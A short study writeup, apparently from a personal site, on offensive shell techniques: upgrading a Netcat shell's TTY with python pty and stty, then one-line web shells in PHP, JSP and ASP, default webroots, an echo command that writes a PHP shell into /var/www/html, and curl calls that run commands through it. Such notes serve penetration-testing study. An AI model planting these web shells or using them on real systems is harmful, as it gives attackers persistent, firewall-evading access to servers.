husayn gokal
Geneva

← Writeups

TTY

Tool
Date
2026-05-17

Often after connecting to a shell using Netcat, our commands are limited. To perform extra commands, the TTY needs to be upgraded by mapping our terminal TTY with the remote TTY.

There are many methods to upgrade the TTY of the target machine. One method is the “python/stty” method:

python -c 'import pty; pty.spawn("/bin/bash")'

THEN HIT CTRL+Z AND DO THE FOLLOWING:

stty raw -echo
fg
[Enter]
[Enter]

Once we hit fg, it will bring back our netcat shell to the foreground. At this point, the terminal will show a blank line. We can hit enter again to get back to our shell or input reset and hit enter to bring it back.

The shell doesn’t cover the entire terminal though. For that, a few variables need to be figured out on our system, and then changed on the remote system:

echo $TERM
stty size

These can then be changed on the remote system as such:

export TERM=xterm-256color
stty rows 67 columns 318

A Web Shell is typically a web script in PHP Or ASPX that accepts commands through HTTP request parameters like GET/POST, executes the commands and prints their output back on the web page.

Web Shell Scripts are usually one-liners and are very easy to memorize:

php:
<?php system($_REQUEST["cmd"]); ?>

jsp:
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

asp:
<% eval request("cmd") %>

Once the web shell has been accessed, the script needs to be placed in the remote host’s web directory (also called the “webroot”) to execute the script through the web browser. This requires exploiting a vulnerability in an upload feature, allowing us to write a shell to a file and upload it, then access that uploaded file to execute commands.

If we only have remote command execution through an exploit, we can write our shell directly to the webroot to access it over the web. So, the first step is to identify where the webroot is.

The following are the default webroots for common web servers:

Web Server Default Webroot
Apache /var/www/html/
Nginx /usr/local/nginx/html/
IIS c:\inetpub\wwwroot|
XAMPP C:\xampp\htdocs|

We can check these directories to see which webroot is in use and then use echo to write out our web shell. As an example:

bash:
echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php

The web shell can then be accessed through the browser or by using cURL:

<http://IP>:PORT/shell.php?cmd=id

OR using cURL:

curl <http://IP>:PORT/shell.php?cmd=id

A great benefit of web shells are that they bypass any firewall restrictions in place, as it won’t open a new connection on a port but run on the web ports 80 or 443 (whatever the web app is using). Even if the host is rebooted, the web shell would still be in place.

Web Shells are not as interactive as reverse and bind shells since different URLs have to be requested to execute commands. However, in extreme cases Python scripts can be used to automate this process and give us a semi-interactive web shell within our local terminal…